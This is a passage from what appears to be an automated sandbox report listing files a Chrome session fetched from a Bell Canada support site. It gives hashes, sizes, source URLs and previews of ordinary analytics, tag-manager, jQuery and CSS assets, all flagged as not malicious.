                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd18a66557b034fc5825d670005205c3a-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd18a66557b034fc5825d670005205c3a-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd18a66557b034fc5825d670005205c3a-source.min.js', "try{!function(e,t,a){if(!e.snaptr){var n=e.snaptr=function(){n.handleRequest?n.handleRequest.apply(n,arguments):n.queue.push(arguments)};n.queue=[];var s=\"script\";r=t.createElement(s),r.async=!0,r.src=a;var o=t.getElementsByTagName(s)[0];o.parentNode.insertBefore(r,o)}}(window,document,\"https://sc-static.net/scevent.min.js\");var pgn=(pgn=_satellite.getVar(\"d_page_name\")||\"\").toLowerCase(),prevPgn=_satellite.cookie.get(\"__bda_prev_previouspagename\")||\"\",mobRE=/^shop:(mobile:|Cart mobility:Summary|Checkout (mobility:|accessories:))/i,isMob=mobRE.test(pgn)||\"storelocator:landing page\"==pgn&&mobRE.test(prevPgn),scID=\"50a38fee-9934-45ee-950b-5f4599360ebf\";isMob&&(scID=\"f99033df-58a1-4
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (33379), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):33379
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1065918509650805
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:GKqZzz8X21jF2Vn8LJMurwD+l4hj+zIOGWsWEawZq2xyDHgLX/jg:eL3+n1EwDvrPWs+2qF
                                                                                                                                                                                                                                                                                                                                      MD5:41F4301D02B2889FB4D8A8067F350768
                                                                                                                                                                                                                                                                                                                                      SHA1:5CD52BAD684A3D554B40C2D56953EE69C473B3A0
                                                                                                                                                                                                                                                                                                                                      SHA-256:F4AF2A9C01F60CAF9FEFCA07A215E65AAEBB13A3144FE6E21DC4B9B1C18480E7
                                                                                                                                                                                                                                                                                                                                      SHA-512:71CD9E96B39E5310946AE5D1456CAAAEE888910208BADEB2B078A4D9955C18110B46DEB05632CAC4ED9954DA612CB2B35D56E03775A5E66514E48074251F2729
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/Styles/BRF3/core/js/connector.js
                                                                                                                                                                                                                                                                                                                                      Preview:var BELL = function (e) { return e.gConnector.utils = { cookieManager: { setLanguageRegionCookieValue: function (e, t, n, o) { var i = "gemini", a = 1 == o ? null : BELL.gConnector.utils.cookieManager.getCookie(i), c = BELL.gConnector.utils.cookieManager.getGeminiString(e, t, a, n), l = ".bell.ca"; window.location.hostname.toLowerCase().indexOf("virginmobile.ca") > -1 && (l = ".virginmobile.ca"), BELL.gConnector.utils.cookieManager.setCookie(i, c, 90, l) }, getGeminiString: function (e, t, n, o) { var i = "region=" + t + "|language=" + e + "|province=" + t + "|LarSegmentType=" + o; if (null != n) { var a = n.split("|"); null != t && 0 != t.length && (a[0] = "region=" + t, a[2] = "province=" + t), null != e && 0 != e.length && (a[1] = "language=" + e), null != o && null != o && 0 != o.length && (a[3] = "LarSegmentType=" + o), i = a[0] + "|" + a[1] + "|" + a[2] + "|" + a[3] } return i }, getCookie: function (e) { var t = ("; " + document.cookie).split("; " + e + "="); if (2 == t.length)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (540), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):863241
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.8696705844016535
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:c76BHPgYJZF1KQn7UJWFtKdnjU5hHcFhs5JicmAACUoetWQ1m2hlzNBFvPlK9dZX:GhcigkWQ1molRzLJhmH2eygEQmE3
                                                                                                                                                                                                                                                                                                                                      MD5:A4A66A43CE8E595D3857AB6C96A2ABF0
                                                                                                                                                                                                                                                                                                                                      SHA1:9EA24E5B154ECB220C4297F4ED722205D14E9B5F
                                                                                                                                                                                                                                                                                                                                      SHA-256:72C0981C35734C6D300B0E3C88BE5AA1A954910E51C10A57DA240D3304B86E1E
                                                                                                                                                                                                                                                                                                                                      SHA-512:EEE573AFAE3C9CD7ADA9514FC87B107564D0FCD71F2A436F49CCC454D3D910DBB52D3FDA3610ADC17969DE858DE33D01968D08A3BCF06B642477CCC33C319C11
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/styles/RSX/framework/css/bell.css?v=hNO3boaT_y4jt0VMsLROOeVpfOUXy-KkONhXHKpeYhQ1&ver=00000000
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(9506,45): run-time error CSS1030: Expected identifier, found '.'..(9506,77): run-time error CSS1031: Expected selector, found ')'..(9506,77): run-time error CSS1025: Expected comma or open brace, found ')'..(9510,45): run-time error CSS1030: Expected identifier, found '.'..(9510,77): run-time error CSS1031: Expected selector, found ')'..(9510,77): run-time error CSS1025: Expected comma or open brace, found ')'.. */../*!.. * Bootstrap v3.3.4 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */..../*!.. * Generated using the Bootstrap Customizer (http://getbootstrap.com/customize/?id=8bd78d2cf025d8649ff5).. * Config saved to config.json and https://gist.github.com/8bd78d2cf025d8649ff5.. */../*! normalize.css v3.0.2 | MIT License | git.io/normalize */..html {.. font-family: sans-serif;.. -ms-text-size-adjust: 100%;.. -webkit-text-size-a
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):411
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.330774188903462
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApB0WTbjpct/BeTrAApB0WTbjcLd+JyRE/NiZy7jZyOKU3F9e:zlPdct/BMlPVJJ/NNJKSFI
                                                                                                                                                                                                                                                                                                                                      MD5:C7BB7798214914B0A97B6994FD48EE0F
                                                                                                                                                                                                                                                                                                                                      SHA1:AA443B5FA4EAD2D13AEBC21B59ECB69118BAB0D3
                                                                                                                                                                                                                                                                                                                                      SHA-256:CED6F44AD8DF26B27D64189B9B6999CEC603B82539B9DDAD46CDD37EE56EF700
                                                                                                                                                                                                                                                                                                                                      SHA-512:FD2BB2B06BF3BE12F9DB905001B046F4B5FF5FA110BEB0B5F68051751D7D0EDEE162438F709699D023D5BEA1114E73765992C73F840331032234322E3FE94004
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCb7424d10cb45420b8dd270fd16b2f20a-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCb7424d10cb45420b8dd270fd16b2f20a-source.min.js', "_satellite.getVar(\"d_tracking_enabled\")&&s_oTrackPageLoad&&s_oTrackPageLoad({s_oTrackingSource:\"Page load\"});");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (13876)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):344092
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.604905385488435
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:p4HQGbgBuDo0k2639cM8Gp/F2wVtu9BW24nOz:iH9cuDo0yVAEA
                                                                                                                                                                                                                                                                                                                                      MD5:A1D9148A9D9DA71E118F39C2AC3E74F1
                                                                                                                                                                                                                                                                                                                                      SHA1:C707CA2FABD593F8AEED56AD5DBADC7C33844101
                                                                                                                                                                                                                                                                                                                                      SHA-256:0369EF11A2851CAD4F66E639FABEFD940E99A532F552A812F70CE2B3B48F85F7
                                                                                                                                                                                                                                                                                                                                      SHA-512:D7DCD92F6995596ED05B17EC1CA7BC3D193FECB5FBB15A9B70E96587237F55009A60C2E35DB01F3647BB4F2983C2506FB722E2EEC753083A281CD2FD49A4C6BA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=G-MTKGWZ28E4&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":29,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":107},{"function":"__ogt_ip_mark","priority":29,"vtp_instanceOrder":1,"vtp_paramValue":"internal","vtp_ruleResult":["macro",2],"tag_id":109},{"function":"__ogt_dma","priority":29,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":110},{"function":"__ogt_1p_data_v2","priority":29,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailTy
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (306)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):453
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.382146487038442
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:jvgeTrAApBUQkRjKct/BeTrAApBUQkRjnLpKJy7rcJy71U/:zlRkRjKct/BMlRkRjlKJWcJP
                                                                                                                                                                                                                                                                                                                                      MD5:7C19AB31B2BE8287A6C7588F00E26F4B
                                                                                                                                                                                                                                                                                                                                      SHA1:A7B67ED798EF4778CA8A80B150E367BB345207BA
                                                                                                                                                                                                                                                                                                                                      SHA-256:2A1FECD7ABC4FD5CF59C210DFEEB99B5DF930ABF127E4C7D32A51FD3E49DB652
                                                                                                                                                                                                                                                                                                                                      SHA-512:05D69CA248599B085FDDEAC78DDA210ACE4D10126B3EE79907404E9A35AC96070BA0E460C937379F3AA327C045461DF5E7408D04F59D4F7BC83D81E3FE2F5361
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC75774c0414094b0fb6a984a589f3a296-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC75774c0414094b0fb6a984a589f3a296-source.min.js', "!0===_satellite.getVar(\"d_consent_banner_check\")?window.s_oOTB=!1:!1===_satellite.getVar(\"d_consent_banner_check\")?window.s_oOTB=!0:window.s_oOTB=null;");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):149805
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.6004134683803555
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:Cnxj4bndhXdOU0tNo455wjdrm/bK+OTRMWMrvBDJTcitj+wf2EAeiPWMWNZVgdyo:Cnxj479OU03o4PwjhIBVT39ROyuvb
                                                                                                                                                                                                                                                                                                                                      MD5:5693E74A87CDFE0DD8CF9E97ABC2EC67
                                                                                                                                                                                                                                                                                                                                      SHA1:0912A92CEBFC4248B4D561F57B32D18135F9AD59
                                                                                                                                                                                                                                                                                                                                      SHA-256:79951B5BD4D729A2B2F4D380819F2C14BBCF26F21DB56A520189633467766CF4
                                                                                                                                                                                                                                                                                                                                      SHA-512:B0954FF6229C037AAEC67F6CC91889D3AD1C0D38AC3E53E61F3A98D49379FA43C1FF709C7017459B9BD416BCEB2236D90B24C17E072882C122360069DCD9E0E0
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://analytics.tiktok.com/i18n/pixel/static/identify_7bf75739.js
                                                                                                                                                                                                                                                                                                                                      Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (34755), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):112043
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.998577146099376
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:bMpbedfDvegHMtPQH1QVAEKmSQRQMh1JjSkB:gpCdfDvegstPQVQVAfmSQrnFSkB
                                                                                                                                                                                                                                                                                                                                      MD5:5B1401E36D0299353503EE77B95B45FA
                                                                                                                                                                                                                                                                                                                                      SHA1:5BF8FFA98608B6B711C84D87D2CBD8CCD158E05A
                                                                                                                                                                                                                                                                                                                                      SHA-256:B3E63C4EC315ED13E0B37DC2F610F5ECBC0BACFFD0B087218ACC759A8F280C19
                                                                                                                                                                                                                                                                                                                                      SHA-512:E82CBAC0C20AFAA48DEF857384FED93EDB8B6FA735548CE329699C2CECCBD382B3E6E4894A52330030FD20F2C715E8A4E1E91F499EADCDD632C03FF8FE921016
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function (e, t) {.. var n, r, i = typeof t, o = e.location, a = e.document, s = a.documentElement, l = e.jQuery, u = e.$, c = {}, p = [], f = "1.10.2", d = p.concat, h = p.push, g = p.slice, m = p.indexOf, y = c.toString, v = c.hasOwnProperty, b = f.trim, x = function (e, t) { return new x.fn.init(e, t, r) }, w = /[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source, T = /\S+/g, C = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g, N = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/, k = /^<(\w+)\s*\/?>(?:<\/\1>|)$/, E = /^[\],:{}\s]*$/, S = /(?:^|:|,)(?:\s*\[)+/g, A = /\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g, j = /"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g, D = /^-ms-/, L = /-([\da-z])/gi, H = function (e, t) { return t.toUpperCase() }, q = function (e) { (a.addEventListener || "load" === e.type || "complete" === a.readyState) && (_(), x.ready()) }, _ = function () { a.addEventListener ? (a.removeEventListener("DOMContentLoaded", q, !1), e.removeEventListener("load", q, !1)) : (a.detachEvent("
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.904157601986404
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREuP1yqXXl6EJPA1CSHI:UrXiHPwqX1l8Ro
                                                                                                                                                                                                                                                                                                                                      MD5:D5B2ABFA0AC10C041D40613D226A067D
                                                                                                                                                                                                                                                                                                                                      SHA1:4D791DA7F753D6BD3D582252561F177A2E8D97D7
                                                                                                                                                                                                                                                                                                                                      SHA-256:96D36AEBA93802197A777EEA4B7B5BF97AD603175D36B8737F0101E43F7F28E6
                                                                                                                                                                                                                                                                                                                                      SHA-512:F925A88FB38B3AA944568410662418C4131CDB87950FAF374E55F90975F9A3346F0392B03224DAF2E65427623039581E99C0FBC9C60F36D1935ABBB52CBC5E6E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__13
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__13 === 'function' && branch_callback__13("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (17742), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):17742
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183768985902116
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:i4kGYyeNWeUMkYiXekYiXCLMV7rKV7LnA9MMJQ2n/eqzzH:KMJrXlXHhKJ8JDdHH
                                                                                                                                                                                                                                                                                                                                      MD5:0C330D247B153A9FF7A42F2D893BFA9A
                                                                                                                                                                                                                                                                                                                                      SHA1:6018C728AEF30B3BCD8A9D0683BDA8F4B6AEAEED
                                                                                                                                                                                                                                                                                                                                      SHA-256:7535AE8056317831D7C03DF22863A47BD72B9AAADD0A0B9314AAA95D1BEFE718
                                                                                                                                                                                                                                                                                                                                      SHA-512:BAA4A7D4D333D0BD25672A007CF0B4BBD37D75B5AE45AA095A0E0E1980095D2B5147C96A3AF2FA386E4AEC0E398C375729D6123E2FB3F9BB2CABDE79E4224361
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/_web/custom/js/echat/echat-omniture.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:var omnitureInterval, counter = !1, proActiveCounter = !1, newSessionAgent = !1, newSessionMsg = !1, newSessionMinimize = !1, newSessionStartOver = !1, newSessionChatTranscript = !1, newSessionClose = !1, newSessionsocketConnected = !1, chatdetails = ""; function getOmnitureCookie(e) { var t = {}; return document.cookie.split(";").forEach(function (e) { var n = e.split("=")[0], o = e.substring(e.split("=")[0].length + 1); t[n.trim()] = o }), t[e] } var socketConnected = "", isChatOpen = "", isChatAgentConnected = "", chatId = "", engagementId = "", chatEngineType = "", clickedStartOver = !1, isChatActive = "", chatEntry = "", pageCategory = "", isProactive = "", proactiveType = "", omnitureCookieNames = ["__csomni", "__ceidomni", "__cacomni", "__cminomni", "__cromni", "__ctromni", "__cepomni", "__cpcpomni", "__cabomni", "__cpaomni"]; setInterval(function () { var e = void 0 !== getOmnitureCookie("__eccomp"), t = e ? readCookieContentById("eccompslex", "__cwss") : getOmnitureCookie("__c
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):51385
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.293328685395304
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:IaOFhhRC5JFhLjfRysgLzQynDw5YyDMFW8KQ:IaOFnR2DRszQKaoWtQ
